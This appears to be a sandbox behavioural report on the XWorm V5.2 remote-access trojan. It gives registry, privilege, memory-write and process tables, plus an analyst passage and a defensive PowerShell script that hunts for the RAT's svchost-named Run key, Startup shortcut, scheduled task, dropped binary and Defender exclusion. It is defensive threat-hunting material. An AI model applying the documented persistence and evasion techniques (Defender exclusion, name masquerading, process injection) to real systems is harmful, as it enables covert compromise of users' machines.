Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133699686782854814" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133670809812906216" C:\Windows\system32\svchost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
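
Taken together, the persistence rows above describe one coherent set of artifacts: a Run value named svchost pointing at C:\ProgramData\svchost.exe, a svchost.lnk in the user's Startup folder, and a scheduled task named svchost whose XML lands in C:\Windows\System32\Tasks\svchost (the Task Scheduler service runs inside a real svchost.exe, which is why the "Drops file in System32 directory" rows attribute that write to svchost.exe rather than to the malware). The dropped binary borrows the svchost name to blend in with the genuine service hosts; the giveaway is the path, since the real svchost.exe lives only under System32 and SysWOW64. Two further points from this detonation matter for the hunt: the process list shows a Defender exclusion being added for the dropper's own .bat, and the NtCreateUserProcessOtherParentProcess row attributes the creation of XWorm V5.2.exe (PID 5096) to svchost.exe (PID 3124), so parent/child rules keyed on the original dropper will not see that launch. Hunting for the artifacts themselves does not depend on the process lineage.

The script below is an added example, not part of the report: it checks a host for exactly these artifacts and for the broader conditions each one implies. Run it as the affected user (the Run key and Startup folder are per-user) from an elevated prompt, which the Defender and scheduled-task queries need on most hosts. The exclusion-path heuristic (any exclusion under a user profile or Temp) and the "svchost.exe outside System32" check are the example's own generalisations of the report's indicators.

```powershell
# Hunt-XWormPersistence.ps1 (added example): checks a host for the persistence
# and defence-evasion artifacts recorded in the behavioral2 detonation.
$findings = [System.Collections.Generic.List[string]]::new()

# 1. Run key: HKCU\...\Run\svchost = "C:\ProgramData\svchost.exe"
$runKey = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
if ($run -and $run.PSObject.Properties['svchost']) {
    $findings.Add("Run value 'svchost' -> $($run.svchost)")
}

# 2. Startup folder shortcut named svchost.lnk; resolve where it points.
$lnk = Join-Path ([Environment]::GetFolderPath('Startup')) 'svchost.lnk'
if (Test-Path $lnk) {
    $target = (New-Object -ComObject WScript.Shell).CreateShortcut($lnk).TargetPath
    $findings.Add("Startup shortcut $lnk -> $target")
}

# 3. Dropped binary masquerading as svchost outside System32.
$drop = 'C:\ProgramData\svchost.exe'
if (Test-Path $drop) {
    $h = (Get-FileHash -Algorithm SHA256 $drop).Hash
    $findings.Add("Dropped binary $drop SHA256=$h")
}

# 4. Scheduled task named svchost (its XML is C:\Windows\System32\Tasks\svchost).
$task = Get-ScheduledTask -TaskName 'svchost' -ErrorAction SilentlyContinue
if ($task) {
    $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    $findings.Add("Scheduled task '$($task.TaskName)' in $($task.TaskPath) runs: $actions")
}

# 5. Defender exclusions. The dropper excluded its own .bat under %TEMP%; any
#    exclusion under a user profile or Temp deserves a look, not just that one.
$excl = (Get-MpPreference -ErrorAction SilentlyContinue).ExclusionPath
foreach ($p in @($excl)) {
    if ($p -and ($p -match '\\AppData\\Local\\Temp\\' -or $p -match '^C:\\Users\\')) {
        $findings.Add("Defender exclusion path: $p")
    }
}

# 6. Any running svchost.exe whose image is not the genuine one. Path is null for
#    processes this session cannot open, so those are skipped rather than flagged.
Get-Process -Name svchost -ErrorAction SilentlyContinue |
    Where-Object { $_.Path -and $_.Path -notmatch '^C:\\Windows\\(System32|SysWOW64)\\svchost\.exe$' } |
    ForEach-Object { $findings.Add("svchost.exe PID $($_.Id) running from $($_.Path)") }

if ($findings.Count -eq 0) { 'No XWorm persistence artifacts found.' }
else { $findings | ForEach-Object { "[!] $_" } }
```

Usage: .\Hunt-XWormPersistence.ps1 on a suspect host. A hit on checks 1 to 4 should be treated as confirmed persistence and the task, Run value, shortcut and binary removed together, since the sample sets up all of them and any one left behind restores the RAT at next logon. Check 5 is the one to act on first during response, because as long as the exclusion stands Defender will not scan the loader even after the rest is cleaned up.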

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3584 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 3584 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
PID 3584 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 3584 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe C:\Windows\system32\cmd.exe
PID 4692 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4692 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4692 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4692 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 1720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 1720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 1136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2412 wrote to memory of 1136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1136 wrote to memory of 3952 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1136 wrote to memory of 3952 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 3088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 3088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3952 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 3452 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1512 wrote to memory of 3348 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1364 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 4564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1940 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 2512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1120 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 2532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1280 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 4420 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 2436 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 464 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 2208 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 2200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 1804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 2392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 1512 wrote to memory of 1600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 1512 wrote to memory of 3568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

